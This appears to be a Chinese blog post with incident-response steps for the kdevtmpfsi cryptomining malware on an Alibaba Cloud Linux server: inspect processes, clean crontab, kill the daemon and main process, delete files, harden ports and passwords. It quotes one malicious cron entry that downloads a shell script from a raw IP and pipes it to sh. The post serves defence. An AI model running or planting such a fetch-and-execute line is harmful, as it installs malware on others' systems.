阿里云 kdevtmpfsi挖矿病毒_服务器病毒处理

最新推荐文章于 2024-01-10 13:53:20 发布
最新推荐文章于 2024-01-10 13:53:20 发布
阅读量298 收藏
点赞数
分类专栏: Linux服务器安全维护 文章标签: linux 内核 文件系统 网络 服务器 安全 挖矿病毒 挖矿病毒 cpu占用率过高
本文为博主原创文章,转载请注明原创地址。
本文链接:https://blog.csdn.net/weixin_38023579/article/details/107224984
版权

1. 首先了解几个事实

  • 病毒进程设置了定时任务,会定时从远程服务器拉取病毒,并执行启动
  • 病毒进程拥有守护进程,杀死主进程后会被守护进程唤醒
  • 黑客能给系统注入定时任务,表明系统或系统内的某些软件存在漏洞(如redis,hadoop)导致黑客能提权

2. 所以解决思路就是

  • 删除系统内的异常定时任务
  • 杀死守护进程后再杀死主进程
  • 关闭非必须的端口,修改各软件的默认端口并设置登录密码,密码使用复杂密码

3. 具体处理步骤如下

  1. top c 查看异常的进程及执行路径,cpu占用异常的

  2. systemctl status 进程id ,查找进程相关信息(进程目录,相关联的其它进程)

  3. 在/etc/crontab、/var/spool/cron/、/var/spool/cron/crontabs/下查看可以文件,查看文件里的异常任务

例如:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
 
# For details see man 4 crontabs
 
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
下方这条定时任务就是从远程拉取病毒脚本,属于异常任务
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1

  1. 删除掉所有的异常定时任务

  2. 删除掉守护进程,再删除主进程

  3. 删除木马程序文件

叶巨岩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云物联平台配置_32.zip
05-13
自动转换密匙
记录一次阿里云服务器挖矿木马 [kthreaddk] 处理记录
最新发布
weixin_51906455的博客
01-31 142
记录一次阿里云服务器挖矿木马 [kthreaddk] 处理记录
Linux服务器kdevtmpfsi挖矿病毒解决方法:治标+治本
热门推荐
Cupster
02-25 4万+
问题描述 Linux服务器(包括但不限于CentOS)出现名为kdevtmpfsi的进程,占用高额的CPU、内存资源; 并且单纯的kill -9 进程ID 例:kill -9 23455无法完全杀死,不久便会复活; 同2.理杀死 kdevtmpfsi的守护进程kinsing,一小段时间又会出现这对进程; 找到并删除这2个进程对应的可执行文件例:find / -name kinsing,一小段时......
kdevtmpfsi 处理挖矿病毒清除)
Ancoda的博客
04-26 6853
kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。普遍比较明显的就是 占用高额的CPU、内存资源,而且受害者还不少。
kdevtmpfsi 挖矿病毒清除
u010227042的博客
03-11 960
保险:如果CPU还是高速运转,你只需重复第一步即刻,因为它的威胁文件被我删除了,如果还在跑我们清理。这个病毒大多数都是通过你的redis 程序侵入的,你只需要配置,所以你要配置你的redis配置文件。crontab -r //表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。这个病毒会在你的主机密钥中加入他们的公钥,这是他们留了后门的钥匙,可以免密登录你的电脑。vim ~/.ssh/authorized_keys //打开文件后删除不认识的公钥。进程,就不会再有了,
挖矿病毒 kdevtmpfsi处理办法
weixin_42329623的博客
04-02 1516
挖矿病毒 kdevtmpfsi 的查找与处理办法
服务器帮助文档_阿里云服务器帮助文档_
10-01
阿里云服务器的帮助文档,包括购买,简介,入门,部署运维等内容
SendSms_调取阿里云短信接口脚本_
10-03
阿里云短信接口脚本,执行批处理文件实现发送短信
QT连接阿里云服务器的MySql数据库示例
06-10
QT连接阿里云服务器的MySql数据库示例
09_12_阿里云主机配置_ffmpeg编译
07-01
09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云...
记一次服务器服务器kdevtmpfsi病毒的解决
Dark_AK44的博客
06-08 1601
服务器 被植入 kdevtmpfsi 病毒,治标治本
AWS 云服务器kdevtmpfsi挖矿病毒处理方法
qq_38829237的博客
11-17 908
亚马逊云 kdevtmpfsi 挖矿病毒处理记录
linux处理kdevtmpfsi,kswapd0(挖矿病毒清除)
bluesease的博客
12-12 2873
kdevtmpfsi,kswapd0挖矿病毒问题处理
linux下“kdevtmpfsi“与“kinsing“进程导致系统卡顿
全栈开发者的博客
11-23 1202
系统卡顿,top下发下cpu异常 kdevtmpfsi是一种挖矿病毒,而且有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 1.杀掉进程并删除文件(杀掉之后还会重新启动) ps -aux | grep kinsing kill -9 15881 ps -aux | grep kdevtmpfsi kill -9 15881 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kins.
病毒】【CPU使用率为100%】Linuxkdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1098
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
【应急响应】kdevtmpfsi挖矿病毒紧急处置
m0_74272345的博客
12-15 395
师姐刚买的阿里云被种了kdevtmpfsi挖矿木马,贴点聊天记录(哈哈哈哈哈哈哈哈哈哈哈)说实话以前都是看过一些博客、推送,只是知道有挖矿木马这个东西,也没有接触过应急响应,全程是以最近打渗透学到的东西来摸索的第一次真的遇到还挺激动的,处理完发现其实也没太难,就是途中走了很多弯路,但曲折才能进步嘛,所以把弯路也做个记录同时是两条线在做,师姐在找杀毒软件,我在手动处理
挖矿病毒清除 kdevtmpfsi
michaeldongd的博客
01-10 385
阿里云公布分报告,链接地址摘取下重要信息来看的话:其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害极大。
记一次云服务器被挂了kdevtmpfsi挖矿病毒的解决
骷大人的博客
05-26 372
最近服务器的mysql响应总是特别慢,一开始没注意,后来偶然一次打开云后台显示cpu炸了都快,想着肯定是中招了,用top一看果然有个奇怪的kdevtmpfsi进程,搜索了下是挖矿病毒。端口能不开启就别开,别偷懒。像redis这种服务,使用强密码,并且开启保护模式,不允许外网连接。可以写一个脚本检测服务区使用情况,如果异常就用机器人提醒。
Linux——kdevtmpfsi挖矿)进程解决方法与解决过程
Hern(宋兆恒)
03-23 9579
问题 CPU堵塞(100%)。我这里的主进程是YDService,你的可能和我的不一致。 原因 服务器密码被别人知道 防火墙设置问题 …… 解决方法 1、查看进程,记录下占用CPU的进程PID(包括挖矿主进程PID)命令: top 或 ps aux | less 2、查看异常链接(有助于发现问题缘由),命令: netstat -natp 或 netstat -n...
asp.net一般处理程序运行到阿里云服务器
05-05
ASP.NET一般处理程序可以在阿里云服务器上运行,但需要在阿里云服务器上安装IIS(Internet Information Services)或者其他支持ASP.NET的Web服务器。同时,需要将ASP.NET处理程序发布到阿里云服务器上,并配置服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值